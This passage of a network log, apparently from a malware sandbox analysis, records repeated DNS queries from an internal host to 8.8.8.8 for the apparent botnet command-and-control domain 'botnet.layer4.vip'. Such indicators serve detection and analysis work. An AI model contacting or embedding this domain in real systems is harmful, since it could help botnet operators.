                                  Apr 9, 2023 03:31:35.149790049 CEST192.168.2.238.8.8.80xdf71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.165385962 CEST192.168.2.238.8.8.80xdf71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.189640045 CEST192.168.2.238.8.8.80xdf71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.214163065 CEST192.168.2.238.8.8.80xdf71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.229679108 CEST192.168.2.238.8.8.80xdf71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.245573044 CEST192.168.2.238.8.8.80x5941Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.261111021 CEST192.168.2.238.8.8.80x5941Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.285330057 CEST192.168.2.238.8.8.80x5941Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.300894976 CEST192.168.2.238.8.8.80x5941Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.316452980 CEST192.168.2.238.8.8.80x5941Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.332326889 CEST192.168.2.238.8.8.80xc040Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.348187923 CEST192.168.2.238.8.8.80xc040Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.364015102 CEST192.168.2.238.8.8.80xc040Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.380014896 CEST192.168.2.238.8.8.80xc040Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.404167891 CEST192.168.2.238.8.8.80xc040Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.420144081 CEST192.168.2.238.8.8.80x37d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.435986996 CEST192.168.2.238.8.8.80x37d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.460104942 CEST192.168.2.238.8.8.80x37d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.484225035 CEST192.168.2.238.8.8.80x37d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.500123024 CEST192.168.2.238.8.8.80x37d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.524394035 CEST192.168.2.238.8.8.80xfe9fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.548552990 CEST192.168.2.238.8.8.80xfe9fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.564152002 CEST192.168.2.238.8.8.80xfe9fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.579699039 CEST192.168.2.238.8.8.80xfe9fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.604142904 CEST192.168.2.238.8.8.80xfe9fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.628668070 CEST192.168.2.238.8.8.80xb4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.644110918 CEST192.168.2.238.8.8.80xb4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.668291092 CEST192.168.2.238.8.8.80xb4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.692739010 CEST192.168.2.238.8.8.80xb4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.716586113 CEST192.168.2.238.8.8.80xb4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.741852999 CEST192.168.2.238.8.8.80x73ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.757775068 CEST192.168.2.238.8.8.80x73ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.781841040 CEST192.168.2.238.8.8.80x73ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.797422886 CEST192.168.2.238.8.8.80x73ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.813261032 CEST192.168.2.238.8.8.80x73ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.828830004 CEST192.168.2.238.8.8.80x4addStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.853164911 CEST192.168.2.238.8.8.80x4addStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.877690077 CEST192.168.2.238.8.8.80x4addStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.902172089 CEST192.168.2.238.8.8.80x4addStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.917766094 CEST192.168.2.238.8.8.80x4addStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.942325115 CEST192.168.2.238.8.8.80x1f19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.966679096 CEST192.168.2.238.8.8.80x1f19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.991148949 CEST192.168.2.238.8.8.80x1f19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.015568018 CEST192.168.2.238.8.8.80x1f19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.040167093 CEST192.168.2.238.8.8.80x1f19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.065562010 CEST192.168.2.238.8.8.80x3937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.081082106 CEST192.168.2.238.8.8.80x3937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.106056929 CEST192.168.2.238.8.8.80x3937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.130537033 CEST192.168.2.238.8.8.80x3937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.146466017 CEST192.168.2.238.8.8.80x3937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.162149906 CEST192.168.2.238.8.8.80xec79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.186516047 CEST192.168.2.238.8.8.80xec79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.202419996 CEST192.168.2.238.8.8.80xec79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.218122959 CEST192.168.2.238.8.8.80xec79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.234006882 CEST192.168.2.238.8.8.80xec79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.249952078 CEST192.168.2.238.8.8.80x5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.265472889 CEST192.168.2.238.8.8.80x5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.290004969 CEST192.168.2.238.8.8.80x5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.305674076 CEST192.168.2.238.8.8.80x5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.321140051 CEST192.168.2.238.8.8.80x5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.345598936 CEST192.168.2.238.8.8.80xea4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.370003939 CEST192.168.2.238.8.8.80xea4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.385868073 CEST192.168.2.238.8.8.80xea4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.409967899 CEST192.168.2.238.8.8.80xea4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.425452948 CEST192.168.2.238.8.8.80xea4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.441062927 CEST192.168.2.238.8.8.80x60b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.465295076 CEST192.168.2.238.8.8.80x60b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.489887953 CEST192.168.2.238.8.8.80x60b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.514115095 CEST192.168.2.238.8.8.80x60b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.529655933 CEST192.168.2.238.8.8.80x60b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.554121017 CEST192.168.2.238.8.8.80xccd9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.570303917 CEST192.168.2.238.8.8.80xccd9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.586237907 CEST192.168.2.238.8.8.80xccd9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.610373020 CEST192.168.2.238.8.8.80xccd9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.634655952 CEST192.168.2.238.8.8.80xccd9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.650559902 CEST192.168.2.238.8.8.80xb23bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.666363955 CEST192.168.2.238.8.8.80xb23bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.682704926 CEST192.168.2.238.8.8.80xb23bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.709453106 CEST192.168.2.238.8.8.80xb23bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.733966112 CEST192.168.2.238.8.8.80xb23bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.750524998 CEST192.168.2.238.8.8.80x8d10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.775006056 CEST192.168.2.238.8.8.80x8d10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.790972948 CEST192.168.2.238.8.8.80x8d10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.806889057 CEST192.168.2.238.8.8.80x8d10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.822768927 CEST192.168.2.238.8.8.80x8d10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.847505093 CEST192.168.2.238.8.8.80x370aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.872498989 CEST192.168.2.238.8.8.80x370aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.897135973 CEST192.168.2.238.8.8.80x370aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.913324118 CEST192.168.2.238.8.8.80x370aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.938330889 CEST192.168.2.238.8.8.80x370aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.954333067 CEST192.168.2.238.8.8.80x9ac3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.970523119 CEST192.168.2.238.8.8.80x9ac3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.995045900 CEST192.168.2.238.8.8.80x9ac3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.019946098 CEST192.168.2.238.8.8.80x9ac3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.044167995 CEST192.168.2.238.8.8.80x9ac3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.060465097 CEST192.168.2.238.8.8.80xa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.076141119 CEST192.168.2.238.8.8.80xa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.100744009 CEST192.168.2.238.8.8.80xa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.125289917 CEST192.168.2.238.8.8.80xa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.149894953 CEST192.168.2.238.8.8.80xa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.174175978 CEST192.168.2.238.8.8.80x2590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.198342085 CEST192.168.2.238.8.8.80x2590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.222629070 CEST192.168.2.238.8.8.80x2590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.238297939 CEST192.168.2.238.8.8.80x2590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.263000011 CEST192.168.2.238.8.8.80x2590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.278759956 CEST192.168.2.238.8.8.80xecedStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.294398069 CEST192.168.2.238.8.8.80xecedStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.318895102 CEST192.168.2.238.8.8.80xecedStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.343300104 CEST192.168.2.238.8.8.80xecedStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.359025955 CEST192.168.2.238.8.8.80xecedStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.383641958 CEST192.168.2.238.8.8.80xd52dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.407783031 CEST192.168.2.238.8.8.80xd52dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.423655987 CEST192.168.2.238.8.8.80xd52dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.447904110 CEST192.168.2.238.8.8.80xd52dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.472127914 CEST192.168.2.238.8.8.80xd52dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.487867117 CEST192.168.2.238.8.8.80x7f0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.512469053 CEST192.168.2.238.8.8.80x7f0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.528409958 CEST192.168.2.238.8.8.80x7f0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.544116974 CEST192.168.2.238.8.8.80x7f0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.560175896 CEST192.168.2.238.8.8.80x7f0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.584579945 CEST192.168.2.238.8.8.80x3d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.608782053 CEST192.168.2.238.8.8.80x3d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.633296013 CEST192.168.2.238.8.8.80x3d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.657726049 CEST192.168.2.238.8.8.80x3d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.682282925 CEST192.168.2.238.8.8.80x3d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.697911024 CEST192.168.2.238.8.8.80xd24fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.722337961 CEST192.168.2.238.8.8.80xd24fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.746727943 CEST192.168.2.238.8.8.80xd24fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.762476921 CEST192.168.2.238.8.8.80xd24fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.787081957 CEST192.168.2.238.8.8.80xd24fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.811152935 CEST192.168.2.238.8.8.80x4f90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.835200071 CEST192.168.2.238.8.8.80x4f90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.859327078 CEST192.168.2.238.8.8.80x4f90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.883363008 CEST192.168.2.238.8.8.80x4f90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.908106089 CEST192.168.2.238.8.8.80x4f90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.924139023 CEST192.168.2.238.8.8.80x73ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.948225975 CEST192.168.2.238.8.8.80x73ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.964083910 CEST192.168.2.238.8.8.80x73ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.979981899 CEST192.168.2.238.8.8.80x73ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.995907068 CEST192.168.2.238.8.8.80x73ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.011986971 CEST192.168.2.238.8.8.80x442cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.027555943 CEST192.168.2.238.8.8.80x442cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.043416977 CEST192.168.2.238.8.8.80x442cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.067873955 CEST192.168.2.238.8.8.80x442cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.092178106 CEST192.168.2.238.8.8.80x442cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.116488934 CEST192.168.2.238.8.8.80xc9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.132853985 CEST192.168.2.238.8.8.80xc9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.148762941 CEST192.168.2.238.8.8.80xc9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.164402962 CEST192.168.2.238.8.8.80xc9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.188472033 CEST192.168.2.238.8.8.80xc9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.204041004 CEST192.168.2.238.8.8.80xb0dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.228354931 CEST192.168.2.238.8.8.80xb0dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.244193077 CEST192.168.2.238.8.8.80xb0dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.268651009 CEST192.168.2.238.8.8.80xb0dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.292865038 CEST192.168.2.238.8.8.80xb0dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.316963911 CEST192.168.2.238.8.8.80xf72bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.341079950 CEST192.168.2.238.8.8.80xf72bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.365107059 CEST192.168.2.238.8.8.80xf72bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.389589071 CEST192.168.2.238.8.8.80xf72bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.414123058 CEST192.168.2.238.8.8.80xf72bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.430119038 CEST192.168.2.238.8.8.80x1ab7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.446120024 CEST192.168.2.238.8.8.80x1ab7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.470575094 CEST192.168.2.238.8.8.80x1ab7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.494771004 CEST192.168.2.238.8.8.80x1ab7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.519198895 CEST192.168.2.238.8.8.80x1ab7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.543710947 CEST192.168.2.238.8.8.80x4222Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.567755938 CEST192.168.2.238.8.8.80x4222Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.591907024 CEST192.168.2.238.8.8.80x4222Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.607834101 CEST192.168.2.238.8.8.80x4222Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.623656988 CEST192.168.2.238.8.8.80x4222Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.648137093 CEST192.168.2.238.8.8.80x22b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.672275066 CEST192.168.2.238.8.8.80x22b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.696805000 CEST192.168.2.238.8.8.80x22b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.721395969 CEST192.168.2.238.8.8.80x22b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.746022940 CEST192.168.2.238.8.8.80x22b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.770131111 CEST192.168.2.238.8.8.80x2ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.794229031 CEST192.168.2.238.8.8.80x2ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.818768978 CEST192.168.2.238.8.8.80x2ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.834414005 CEST192.168.2.238.8.8.80x2ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.850508928 CEST192.168.2.238.8.8.80x2ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.874814987 CEST192.168.2.238.8.8.80x56ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.890317917 CEST192.168.2.238.8.8.80x56ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.905788898 CEST192.168.2.238.8.8.80x56ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.921442986 CEST192.168.2.238.8.8.80x56ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.945643902 CEST192.168.2.238.8.8.80x56ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.969975948 CEST192.168.2.238.8.8.80x54dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.994138002 CEST192.168.2.238.8.8.80x54dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.019112110 CEST192.168.2.238.8.8.80x54dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.034665108 CEST192.168.2.238.8.8.80x54dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.050290108 CEST192.168.2.238.8.8.80x54dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.074908972 CEST192.168.2.238.8.8.80x9780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.090905905 CEST192.168.2.238.8.8.80x9780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.106868982 CEST192.168.2.238.8.8.80x9780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.131261110 CEST192.168.2.238.8.8.80x9780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.155632973 CEST192.168.2.238.8.8.80x9780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.179964066 CEST192.168.2.238.8.8.80xbcbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.195919037 CEST192.168.2.238.8.8.80xbcbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
